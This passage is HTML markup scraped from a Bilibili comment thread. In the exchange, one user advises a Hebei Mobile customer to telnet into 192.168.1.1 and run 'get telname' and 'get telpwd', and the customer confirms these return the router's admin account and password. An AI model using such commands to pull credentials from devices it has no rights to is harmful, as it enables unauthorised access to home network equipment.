var(--brand_blue_thin);&quot;&gt;&lt;div id=&quot;body&quot; style=&quot;position: relative; padding: 8px 0px 8px 34px; border-radius: 4px; --bili-comment-hover-more-display: none;&quot;&gt;&lt;div id=&quot;main&quot; style=&quot;width: 482px; overflow: hidden;&quot;&gt;&lt;bili-comment-user-info style=&quot;--bili-comment-user-info-name-color: var(--text2);&quot;&gt;&lt;div id=&quot;info&quot; style=&quot;display: inline-flex; align-items: center;&quot;&gt;&lt;slot&gt;&lt;a id=&quot;user-avatar&quot; data-user-profile-spmid-follow=&quot;comment.profile.click&quot; target=&quot;_blank&quot; href=&quot;https://space.bilibili.com/566473&quot; data-user-profile-id=&quot;566473&quot; style=&quot;position: absolute; left: 0px; width: 24px; height: 24px;&quot;&gt;&lt;img width=&quot;24&quot; height=&quot;24&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_84131.avif&quot; style=&quot;border-radius: 50%;&quot;/&gt;&lt;/a&gt;&lt;/slot&gt;&lt;div id=&quot;user-name&quot; data-user-profile-spmid-follow=&quot;comment.profile.click&quot; data-user-profile-id=&quot;566473&quot; style=&quot;color: var(--bili-comment-user-info-name-color); font-size: var(--bili-comments-font-size-name, 13px);&quot;&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://space.bilibili.com/566473&quot; class=&quot;&quot; style=&quot;color: inherit;&quot;&gt;Sidoupiar&lt;/a&gt;&lt;/div&gt;&lt;div id=&quot;user-level&quot; style=&quot;margin-left: 5px; width: 30px; height: 30px;&quot;&gt;&lt;img width=&quot;30&quot; height=&quot;30&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164445_17464.svg&quot;/&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-user-info&gt;&amp;nbsp;&lt;bili-rich-text style=&quot;--bili-rich-text-display: inline; --bili-rich-text-white-space: pre-line; --bili-rich-text-word-break: break-word; --bili-rich-text-icon-vertical-align: sub; --bili-rich-text-link-color: var(--Lb6); --bili-rich-text-link-color-hover: var(--brand_blue, #00AEEC); --icon-vertical-align: var(--bili-rich-text-icon-vertical-align); color: var(--bili-rich-text-color, var(--text1, #18191C)); font-size: var(--bili-rich-text-font-size, 15px); line-height: var(--bili-rich-text-line-height, 21px); font-family: var(--bili-font-family); --bili-rich-text-line-height: 24px;&quot;&gt;&lt;p id=&quot;contents&quot; style=&quot;margin-block: 0px; display: var(--bili-rich-text-display); white-space: var(--bili-rich-text-white-space); word-break: var(--bili-rich-text-word-break); -webkit-font-smoothing: antialiased;&quot;&gt;河北移动&lt;/p&gt;&lt;/bili-rich-text&gt;&lt;/div&gt;&lt;div id=&quot;footer&quot; style=&quot;padding-right: 20px;&quot;&gt;&lt;bili-comment-action-buttons-renderer style=&quot;width: 462px; display: flex; align-items: center; position: relative; margin-top: 3px; font-size: 13px; color: var(--text3); --bili-comment-action-buttons-more-display: var(--bili-comment-hover-more-display);&quot;&gt;&lt;div id=&quot;pubdate&quot;&gt;2024-01-23 03:18&lt;/div&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/hand_thumbsup_line/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.283433333333333 2.0303066666666663C9.095466666666667 2.0083933333333333 8.921333333333333 2.09014 8.828166666666666 2.1991199999999997C8.424633333333333 2.6711333333333336 8.332133333333333 3.3649466666666665 8.029333333333334 3.9012466666666663C7.630633333333333 4.607453333333333 7.258833333333333 5.034486666666666 6.800866666666666 5.436006666666666C6.42382 5.7665733333333336 6.042199999999999 5.987959999999999 5.666666666666666 6.09112L5.666666666666666 13.1497C6.19062 13.1611 6.751966666666666 13.168333333333333 7.333333333333333 13.168333333333333C8.831233333333333 13.168333333333333 10.1019 13.120766666666665 10.958166666666665 13.076699999999999C11.565133333333332 13.045433333333332 12.091966666666666 12.7451 12.366466666666668 12.256733333333333C12.7516 11.571599999999998 13.2264 10.5669 13.514166666666664 9.3835C13.7823 8.2808 13.904599999999999 7.374333333333333 13.959466666666666 6.734999999999999C13.984933333333332 6.438646666666667 13.750433333333334 6.166686666666667 13.386666666666665 6.166686666666667L10.065133333333332 6.166686666666667C9.898433333333333 6.166686666666667 9.742666666666667 6.08362 9.649833333333333 5.945166666666666C9.536066666666667 5.775493333333333 9.560033333333333 5.5828533333333334 9.6312 5.403346666666666C9.783966666666666 5.013846666666666 9.983933333333333 4.432846666666666 10.062766666666667 3.90454C10.1406 3.3830066666666667 10.121599999999999 2.9639466666666667 9.917133333333332 2.57626C9.697399999999998 2.1596933333333332 9.448266666666665 2.0495266666666665 9.283433333333333 2.0303066666666663zM10.773433333333333 5.166686666666666L13.386666666666665 5.166686666666666C14.269133333333333 5.166686666666666 15.036999999999999 5.875273333333333 14.9558 6.8206C14.897 7.505533333333333 14.767199999999999 8.462733333333333 14.485833333333334 9.6198C14.170333333333334 10.917200000000001 13.6532 12.008466666666665 13.238166666666666 12.746766666666666C12.7729 13.574433333333333 11.910266666666667 14.029 11.009566666666666 14.075366666666667C10.14 14.120166666666666 8.851766666666666 14.168333333333333 7.333333333333333 14.168333333333333C5.862206666666666 14.168333333333333 4.51776 14.1231 3.565173333333333 14.079633333333334C2.4932333333333334 14.030733333333332 1.5939999999999999 13.234466666666666 1.4786599999999999 12.143466666666665C1.4028 11.426066666666665 1.3333333333333333 10.4978 1.3333333333333333 9.501666666666665C1.3333333333333333 8.588966666666666 1.3916466666666667 7.761233333333333 1.4598999999999998 7.104466666666667C1.5791666666666666 5.95696 2.5641 5.166686666666666 3.671693333333333 5.166686666666666L5.166666666666666 5.166686666666666C5.3793066666666665 5.166686666666666 5.709213333333333 5.063186666666667 6.141613333333333 4.68408C6.516733333333333 4.355193333333333 6.816366666666667 4.015666666666666 7.158533333333333 3.409613333333333C7.5023 2.8007333333333335 7.6041 2.0920066666666663 8.068066666666667 1.54932C8.372133333333332 1.1936466666666665 8.8718 0.9755333333333334 9.399233333333333 1.03704C9.949866666666665 1.10124 10.457733333333334 1.4577866666666666 10.801633333333331 2.109713333333333C11.148866666666665 2.767993333333333 11.143799999999999 3.4356599999999995 11.051833333333335 4.0520933333333335C10.993899999999998 4.44022 10.875366666666666 4.852359999999999 10.773433333333333 5.166686666666666zM4.666666666666666 13.122166666666667L4.666666666666666 6.166686666666667L3.671693333333333 6.166686666666667C3.029613333333333 6.166686666666667 2.5161533333333335 6.615046666666666 2.4545466666666664 7.207833333333333C2.3890599999999997 7.837933333333333 2.333333333333333 8.630433333333333 2.333333333333333 9.501666666666665C2.333333333333333 10.453433333333333 2.399833333333333 11.345266666666667 2.473113333333333 12.038333333333334C2.533993333333333 12.614133333333331 3.0083466666666667 13.053199999999999 3.6107466666666665 13.0807C3.9228066666666668 13.094899999999999 4.278173333333333 13.109333333333334 4.666666666666666 13.122166666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;span id=&quot;count&quot; style=&quot;margin-left: 5px; display: inline-block;&quot;&gt;&lt;/span&gt;&lt;/button&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/hand_thumbsdown_line/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.283433333333333 13.9697C9.095466666666667 13.9916 8.921333333333333 13.909866666666666 8.828166666666666 13.8009C8.424633333333333 13.328866666666666 8.332133333333333 12.635066666666667 8.029333333333334 12.098766666666666C7.630633333333333 11.392566666666667 7.258833333333333 10.9655 6.800866666666666 10.564C6.42382 10.233433333333332 6.042199999999999 10.012033333333333 5.666666666666666 9.908866666666666L5.666666666666666 2.8503266666666662C6.19062 2.83892 6.751966666666666 2.8316799999999995 7.333333333333333 2.8316799999999995C8.831233333333333 2.8316799999999995 10.1019 2.87922 10.958166666666665 2.923313333333333C11.565133333333332 2.9545733333333333 12.091966666666666 3.254906666666667 12.366466666666668 3.74326C12.7516 4.428373333333333 13.2264 5.4331 13.514166666666664 6.616486666666667C13.7823 7.719199999999999 13.904599999999999 8.625666666666666 13.959466666666666 9.265C13.984933333333332 9.561366666666666 13.750433333333334 9.833333333333332 13.386666666666665 9.833333333333332L10.065133333333332 9.833333333333332C9.898433333333333 9.833333333333332 9.742666666666667 9.9164 9.649833333333333 10.054833333333333C9.536066666666667 10.224499999999999 9.560033333333333 10.417133333333332 9.6312 10.596633333333333C9.783966666666666 10.986166666666666 9.983933333333333 11.567166666666667 10.062766666666667 12.095466666666667C10.1406 12.616966666666666 10.121599999999999 13.036066666666665 9.917133333333332 13.423766666666666C9.697399999999998 13.8403 9.448266666666665 13.950466666666665 9.283433333333333 13.9697zM10.773433333333333 10.833333333333332L13.386666666666665 10.833333333333332C14.269133333333333 10.833333333333332 15.036999999999999 10.124733333333332 14.9558 9.1794C14.897 8.494466666666666 14.767199999999999 7.537266666666666 14.485833333333334 6.380213333333334C14.170333333333334 5.08278 13.6532 3.991546666666667 13.238166666666666 3.25324C12.7729 2.425586666666667 11.910266666666667 1.9710199999999998 11.009566666666666 1.9246400000000001C10.14 1.8798599999999999 8.851766666666666 1.8316866666666665 7.333333333333333 1.8316866666666665C5.862206666666666 1.8316866666666665 4.51776 1.8769066666666667 3.565173333333333 1.9203599999999998C2.4932333333333334 1.969253333333333 1.5939999999999999 2.765553333333333 1.4786599999999999 3.856533333333333C1.4028 4.573953333333333 1.3333333333333333 5.502233333333333 1.3333333333333333 6.498353333333332C1.3333333333333333 7.411033333333333 1.3916466666666667 8.238766666666667 1.4598999999999998 8.895533333333333C1.5791666666666666 10.043033333333334 2.5641 10.833333333333332 3.671693333333333 10.833333333333332L5.166666666666666 10.833333333333332C5.3793066666666665 10.833333333333332 5.709213333333333 10.936833333333333 6.141613333333333 11.3159C6.516733333333333 11.644799999999998 6.816366666666667 11.984333333333334 7.158533333333333 12.590399999999999C7.5023 13.199266666666666 7.6041 13.907999999999998 8.068066666666667 14.4507C8.372133333333332 14.806333333333331 8.8718 15.024466666666665 9.399233333333333 14.962966666666667C9.949866666666665 14.898766666666667 10.457733333333334 14.542233333333332 10.801633333333331 13.8903C11.148866666666665 13.232 11.143799999999999 12.564333333333332 11.051833333333335 11.947933333333333C10.993899999999998 11.5598 10.875366666666666 11.147633333333333 10.773433333333333 10.833333333333332zM4.666666666666666 2.8778466666666667L4.666666666666666 9.833333333333332L3.671693333333333 9.833333333333332C3.029613333333333 9.833333333333332 2.5161533333333335 9.384966666666667 2.4545466666666664 8.792166666666667C2.3890599999999997 8.162066666666666 2.333333333333333 7.369566666666666 2.333333333333333 6.498353333333332C2.333333333333333 5.546566666666667 2.399833333333333 4.654719999999999 2.473113333333333 3.96168C2.533993333333333 3.385866666666667 3.0083466666666667 2.946793333333333 3.6107466666666665 2.91932C3.9228066666666668 2.9050866666666666 4.278173333333333 2.8906666666666667 4.666666666666666 2.8778466666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;/button&gt;&lt;div id=&quot;reply&quot; style=&quot;margin-left: 20px;&quot;&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;回复&lt;/button&gt;&lt;/div&gt;&lt;bili-comment-menu style=&quot;--bili-comment-menu-display: none; --bili-comment-menu-position: absolute; --bili-comment-menu-top: 20px; --bili-comment-menu-right: 0;&quot;&gt;&lt;/bili-comment-menu&gt;&lt;/bili-comment-action-buttons-renderer&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-reply-renderer&gt;&lt;bili-comment-reply-renderer style=&quot;--bili-comment-spotlight-color: var(--brand_blue_thin);&quot;&gt;&lt;div id=&quot;body&quot; style=&quot;position: relative; padding: 8px 0px 8px 34px; border-radius: 4px; --bili-comment-hover-more-display: none;&quot;&gt;&lt;div id=&quot;main&quot; style=&quot;width: 482px; overflow: hidden;&quot;&gt;&lt;bili-comment-user-info style=&quot;--bili-comment-user-info-name-color: var(--text2);&quot;&gt;&lt;div id=&quot;info&quot; style=&quot;display: inline-flex; align-items: center;&quot;&gt;&lt;slot&gt;&lt;a id=&quot;user-avatar&quot; data-user-profile-spmid-follow=&quot;comment.profile.click&quot; target=&quot;_blank&quot; href=&quot;https://space.bilibili.com/521361612&quot; data-user-profile-id=&quot;521361612&quot; style=&quot;position: absolute; left: 0px; width: 24px; height: 24px;&quot;&gt;&lt;img width=&quot;24&quot; height=&quot;24&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164445_59314.avif&quot; style=&quot;border-radius: 50%;&quot;/&gt;&lt;/a&gt;&lt;/slot&gt;&lt;div id=&quot;user-name&quot; data-user-profile-spmid-follow=&quot;comment.profile.click&quot; data-user-profile-id=&quot;521361612&quot; style=&quot;color: var(--bili-comment-user-info-name-color); font-size: var(--bili-comments-font-size-name, 13px);&quot;&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://space.bilibili.com/521361612&quot; class=&quot;&quot; style=&quot;color: rgb(251, 114, 153);&quot;&gt;布束砥信゜&lt;/a&gt;&lt;/div&gt;&lt;div id=&quot;user-level&quot; style=&quot;margin-left: 5px; width: 30px; height: 30px;&quot;&gt;&lt;img width=&quot;30&quot; height=&quot;30&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164445_94949.svg&quot;/&gt;&lt;/div&gt;&lt;div id=&quot;user-up&quot; style=&quot;width: 24px; height: 24px;&quot;&gt;&lt;img width=&quot;24&quot; height=&quot;24&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164445_10110.svg&quot;/&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-user-info&gt;&amp;nbsp;&lt;bili-rich-text style=&quot;--bili-rich-text-display: inline; --bili-rich-text-white-space: pre-line; --bili-rich-text-word-break: break-word; --bili-rich-text-icon-vertical-align: sub; --bili-rich-text-link-color: var(--Lb6); --bili-rich-text-link-color-hover: var(--brand_blue, #00AEEC); --icon-vertical-align: var(--bili-rich-text-icon-vertical-align); color: var(--bili-rich-text-color, var(--text1, #18191C)); font-size: var(--bili-rich-text-font-size, 15px); line-height: var(--bili-rich-text-line-height, 21px); font-family: var(--bili-font-family); --bili-rich-text-line-height: 24px;&quot;&gt;&lt;p id=&quot;contents&quot; style=&quot;margin-block: 0px; display: var(--bili-rich-text-display); white-space: var(--bili-rich-text-white-space); word-break: var(--bili-rich-text-word-break); -webkit-font-smoothing: antialiased;&quot;&gt;回复 &lt;a href=&quot;https://space.bilibili.com/566473&quot; target=&quot;_blank&quot; data-type=&quot;mention&quot; data-user-profile-id=&quot;566473&quot; style=&quot;color: var(--bili-rich-text-link-color); background-color: transparent; cursor: pointer;&quot;&gt;@Sidoupiar&lt;/a&gt; :了解了，telnet 192.168.1.1进去之后试试get telname和get telpwd&lt;/p&gt;&lt;/bili-rich-text&gt;&lt;/div&gt;&lt;div id=&quot;footer&quot; style=&quot;padding-right: 20px;&quot;&gt;&lt;bili-comment-action-buttons-renderer style=&quot;width: 462px; display: flex; align-items: center; position: relative; margin-top: 3px; font-size: 13px; color: var(--text3); --bili-comment-action-buttons-more-display: var(--bili-comment-hover-more-display);&quot;&gt;&lt;div id=&quot;pubdate&quot;&gt;2024-01-23 08:10&lt;/div&gt;&lt;div id=&quot;like&quot; style=&quot;margin-left: 20px;&quot;&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/hand_thumbsup_line/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.283433333333333 2.0303066666666663C9.095466666666667 2.0083933333333333 8.921333333333333 2.09014 8.828166666666666 2.1991199999999997C8.424633333333333 2.6711333333333336 8.332133333333333 3.3649466666666665 8.029333333333334 3.9012466666666663C7.630633333333333 4.607453333333333 7.258833333333333 5.034486666666666 6.800866666666666 5.436006666666666C6.42382 5.7665733333333336 6.042199999999999 5.987959999999999 5.666666666666666 6.09112L5.666666666666666 13.1497C6.19062 13.1611 6.751966666666666 13.168333333333333 7.333333333333333 13.168333333333333C8.831233333333333 13.168333333333333 10.1019 13.120766666666665 10.958166666666665 13.076699999999999C11.565133333333332 13.045433333333332 12.091966666666666 12.7451 12.366466666666668 12.256733333333333C12.7516 11.571599999999998 13.2264 10.5669 13.514166666666664 9.3835C13.7823 8.2808 13.904599999999999 7.374333333333333 13.959466666666666 6.734999999999999C13.984933333333332 6.438646666666667 13.750433333333334 6.166686666666667 13.386666666666665 6.166686666666667L10.065133333333332 6.166686666666667C9.898433333333333 6.166686666666667 9.742666666666667 6.08362 9.649833333333333 5.945166666666666C9.536066666666667 5.775493333333333 9.560033333333333 5.5828533333333334 9.6312 5.403346666666666C9.783966666666666 5.013846666666666 9.983933333333333 4.432846666666666 10.062766666666667 3.90454C10.1406 3.3830066666666667 10.121599999999999 2.9639466666666667 9.917133333333332 2.57626C9.697399999999998 2.1596933333333332 9.448266666666665 2.0495266666666665 9.283433333333333 2.0303066666666663zM10.773433333333333 5.166686666666666L13.386666666666665 5.166686666666666C14.269133333333333 5.166686666666666 15.036999999999999 5.875273333333333 14.9558 6.8206C14.897 7.505533333333333 14.767199999999999 8.462733333333333 14.485833333333334 9.6198C14.170333333333334 10.917200000000001 13.6532 12.008466666666665 13.238166666666666 12.746766666666666C12.7729 13.574433333333333 11.910266666666667 14.029 11.009566666666666 14.075366666666667C10.14 14.120166666666666 8.851766666666666 14.168333333333333 7.333333333333333 14.168333333333333C5.862206666666666 14.168333333333333 4.51776 14.1231 3.565173333333333 14.079633333333334C2.4932333333333334 14.030733333333332 1.5939999999999999 13.234466666666666 1.4786599999999999 12.143466666666665C1.4028 11.426066666666665 1.3333333333333333 10.4978 1.3333333333333333 9.501666666666665C1.3333333333333333 8.588966666666666 1.3916466666666667 7.761233333333333 1.4598999999999998 7.104466666666667C1.5791666666666666 5.95696 2.5641 5.166686666666666 3.671693333333333 5.166686666666666L5.166666666666666 5.166686666666666C5.3793066666666665 5.166686666666666 5.709213333333333 5.063186666666667 6.141613333333333 4.68408C6.516733333333333 4.355193333333333 6.816366666666667 4.015666666666666 7.158533333333333 3.409613333333333C7.5023 2.8007333333333335 7.6041 2.0920066666666663 8.068066666666667 1.54932C8.372133333333332 1.1936466666666665 8.8718 0.9755333333333334 9.399233333333333 1.03704C9.949866666666665 1.10124 10.457733333333334 1.4577866666666666 10.801633333333331 2.109713333333333C11.148866666666665 2.767993333333333 11.143799999999999 3.4356599999999995 11.051833333333335 4.0520933333333335C10.993899999999998 4.44022 10.875366666666666 4.852359999999999 10.773433333333333 5.166686666666666zM4.666666666666666 13.122166666666667L4.666666666666666 6.166686666666667L3.671693333333333 6.166686666666667C3.029613333333333 6.166686666666667 2.5161533333333335 6.615046666666666 2.4545466666666664 7.207833333333333C2.3890599999999997 7.837933333333333 2.333333333333333 8.630433333333333 2.333333333333333 9.501666666666665C2.333333333333333 10.453433333333333 2.399833333333333 11.345266666666667 2.473113333333333 12.038333333333334C2.533993333333333 12.614133333333331 3.0083466666666667 13.053199999999999 3.6107466666666665 13.0807C3.9228066666666668 13.094899999999999 4.278173333333333 13.109333333333334 4.666666666666666 13.122166666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;span id=&quot;count&quot; style=&quot;margin-left: 5px; display: inline-block;&quot;&gt;1&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;&lt;bili-icon size=&quot;16&quot; icon=&quot;BDC/hand_thumbsdown_line/1&quot; style=&quot;display: inline-flex; align-items: center; vertical-align: middle;&quot;&gt;&lt;svg id=&quot;icon&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; width=&quot;16&quot; height=&quot;16&quot; viewbox=&quot;0 0 16 16&quot;&gt;&lt;path d=&quot;M9.283433333333333 13.9697C9.095466666666667 13.9916 8.921333333333333 13.909866666666666 8.828166666666666 13.8009C8.424633333333333 13.328866666666666 8.332133333333333 12.635066666666667 8.029333333333334 12.098766666666666C7.630633333333333 11.392566666666667 7.258833333333333 10.9655 6.800866666666666 10.564C6.42382 10.233433333333332 6.042199999999999 10.012033333333333 5.666666666666666 9.908866666666666L5.666666666666666 2.8503266666666662C6.19062 2.83892 6.751966666666666 2.8316799999999995 7.333333333333333 2.8316799999999995C8.831233333333333 2.8316799999999995 10.1019 2.87922 10.958166666666665 2.923313333333333C11.565133333333332 2.9545733333333333 12.091966666666666 3.254906666666667 12.366466666666668 3.74326C12.7516 4.428373333333333 13.2264 5.4331 13.514166666666664 6.616486666666667C13.7823 7.719199999999999 13.904599999999999 8.625666666666666 13.959466666666666 9.265C13.984933333333332 9.561366666666666 13.750433333333334 9.833333333333332 13.386666666666665 9.833333333333332L10.065133333333332 9.833333333333332C9.898433333333333 9.833333333333332 9.742666666666667 9.9164 9.649833333333333 10.054833333333333C9.536066666666667 10.224499999999999 9.560033333333333 10.417133333333332 9.6312 10.596633333333333C9.783966666666666 10.986166666666666 9.983933333333333 11.567166666666667 10.062766666666667 12.095466666666667C10.1406 12.616966666666666 10.121599999999999 13.036066666666665 9.917133333333332 13.423766666666666C9.697399999999998 13.8403 9.448266666666665 13.950466666666665 9.283433333333333 13.9697zM10.773433333333333 10.833333333333332L13.386666666666665 10.833333333333332C14.269133333333333 10.833333333333332 15.036999999999999 10.124733333333332 14.9558 9.1794C14.897 8.494466666666666 14.767199999999999 7.537266666666666 14.485833333333334 6.380213333333334C14.170333333333334 5.08278 13.6532 3.991546666666667 13.238166666666666 3.25324C12.7729 2.425586666666667 11.910266666666667 1.9710199999999998 11.009566666666666 1.9246400000000001C10.14 1.8798599999999999 8.851766666666666 1.8316866666666665 7.333333333333333 1.8316866666666665C5.862206666666666 1.8316866666666665 4.51776 1.8769066666666667 3.565173333333333 1.9203599999999998C2.4932333333333334 1.969253333333333 1.5939999999999999 2.765553333333333 1.4786599999999999 3.856533333333333C1.4028 4.573953333333333 1.3333333333333333 5.502233333333333 1.3333333333333333 6.498353333333332C1.3333333333333333 7.411033333333333 1.3916466666666667 8.238766666666667 1.4598999999999998 8.895533333333333C1.5791666666666666 10.043033333333334 2.5641 10.833333333333332 3.671693333333333 10.833333333333332L5.166666666666666 10.833333333333332C5.3793066666666665 10.833333333333332 5.709213333333333 10.936833333333333 6.141613333333333 11.3159C6.516733333333333 11.644799999999998 6.816366666666667 11.984333333333334 7.158533333333333 12.590399999999999C7.5023 13.199266666666666 7.6041 13.907999999999998 8.068066666666667 14.4507C8.372133333333332 14.806333333333331 8.8718 15.024466666666665 9.399233333333333 14.962966666666667C9.949866666666665 14.898766666666667 10.457733333333334 14.542233333333332 10.801633333333331 13.8903C11.148866666666665 13.232 11.143799999999999 12.564333333333332 11.051833333333335 11.947933333333333C10.993899999999998 11.5598 10.875366666666666 11.147633333333333 10.773433333333333 10.833333333333332zM4.666666666666666 2.8778466666666667L4.666666666666666 9.833333333333332L3.671693333333333 9.833333333333332C3.029613333333333 9.833333333333332 2.5161533333333335 9.384966666666667 2.4545466666666664 8.792166666666667C2.3890599999999997 8.162066666666666 2.333333333333333 7.369566666666666 2.333333333333333 6.498353333333332C2.333333333333333 5.546566666666667 2.399833333333333 4.654719999999999 2.473113333333333 3.96168C2.533993333333333 3.385866666666667 3.0083466666666667 2.946793333333333 3.6107466666666665 2.91932C3.9228066666666668 2.9050866666666666 4.278173333333333 2.8906666666666667 4.666666666666666 2.8778466666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/bili-icon&gt;&lt;/button&gt;&lt;div id=&quot;reply&quot; style=&quot;margin-left: 20px;&quot;&gt;&lt;button style=&quot;padding: 0px; outline: none; border-width: initial; border-style: none; border-color: initial; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; height: 24px; font-size: 13px; display: inline-flex; align-items: center; cursor: pointer;&quot;&gt;回复&lt;/button&gt;&lt;/div&gt;&lt;bili-comment-menu style=&quot;--bili-comment-menu-display: none; --bili-comment-menu-position: absolute; --bili-comment-menu-top: 20px; --bili-comment-menu-right: 0;&quot;&gt;&lt;/bili-comment-menu&gt;&lt;/bili-comment-action-buttons-renderer&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-reply-renderer&gt;&lt;bili-comment-reply-renderer style=&quot;--bili-comment-spotlight-color: var(--brand_blue_thin);&quot;&gt;&lt;div id=&quot;body&quot; style=&quot;position: relative; padding: 8px 0px 8px 34px; border-radius: 4px; --bili-comment-hover-more-display: none;&quot;&gt;&lt;div id=&quot;main&quot; style=&quot;width: 482px; overflow: hidden;&quot;&gt;&lt;bili-comment-user-info style=&quot;--bili-comment-user-info-name-color: var(--text2);&quot;&gt;&lt;div id=&quot;info&quot; style=&quot;display: inline-flex; align-items: center;&quot;&gt;&lt;slot&gt;&lt;a id=&quot;user-avatar&quot; data-user-profile-spmid-follow=&quot;comment.profile.click&quot; target=&quot;_blank&quot; href=&quot;https://space.bilibili.com/566473&quot; data-user-profile-id=&quot;566473&quot; style=&quot;position: absolute; left: 0px; width: 24px; height: 24px;&quot;&gt;&lt;img width=&quot;24&quot; height=&quot;24&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_84131.avif&quot; style=&quot;border-radius: 50%;&quot;/&gt;&lt;/a&gt;&lt;/slot&gt;&lt;div id=&quot;user-name&quot; data-user-profile-spmid-follow=&quot;comment.profile.click&quot; data-user-profile-id=&quot;566473&quot; style=&quot;color: var(--bili-comment-user-info-name-color); font-size: var(--bili-comments-font-size-name, 13px);&quot;&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://space.bilibili.com/566473&quot; class=&quot;&quot; style=&quot;color: inherit;&quot;&gt;Sidoupiar&lt;/a&gt;&lt;/div&gt;&lt;div id=&quot;user-level&quot; style=&quot;margin-left: 5px; width: 30px; height: 30px;&quot;&gt;&lt;img width=&quot;30&quot; height=&quot;30&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164445_17464.svg&quot;/&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-user-info&gt;&amp;nbsp;&lt;bili-rich-text style=&quot;--bili-rich-text-display: inline; --bili-rich-text-white-space: pre-line; --bili-rich-text-word-break: break-word; --bili-rich-text-icon-vertical-align: sub; --bili-rich-text-link-color: var(--Lb6); --bili-rich-text-link-color-hover: var(--brand_blue, #00AEEC); --icon-vertical-align: var(--bili-rich-text-icon-vertical-align); color: var(--bili-rich-text-color, var(--text1, #18191C)); font-size: var(--bili-rich-text-font-size, 15px); line-height: var(--bili-rich-text-line-height, 21px); font-family: var(--bili-font-family); --bili-rich-text-line-height: 24px;&quot;&gt;&lt;p id=&quot;contents&quot; style=&quot;margin-block: 0px; display: var(--bili-rich-text-display); white-space: var(--bili-rich-text-white-space); word-break: var(--bili-rich-text-word-break); -webkit-font-smoothing: antialiased;&quot;&gt;回复 &lt;a href=&quot;https://space.bilibili.com/521361612&quot; target=&quot;_blank&quot; data-type=&quot;mention&quot; data-user-profile-id=&quot;521361612&quot; style=&quot;color: var(--bili-rich-text-link-color); background-color: transparent; cursor: pointer;&quot;&gt;@布束砥信゜&lt;/a&gt; :这个是好使的，这两条指令可以获取到正确的账号和密码，谢谢&lt;/p&gt;&lt;/bili-rich-text&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-reply-renderer&gt;&lt;/div&gt;&lt;/div&gt;&lt;/bili-comment-replies-renderer&gt;&lt;/div&gt;&lt;p data-v-2505e99a=&quot;&quot; 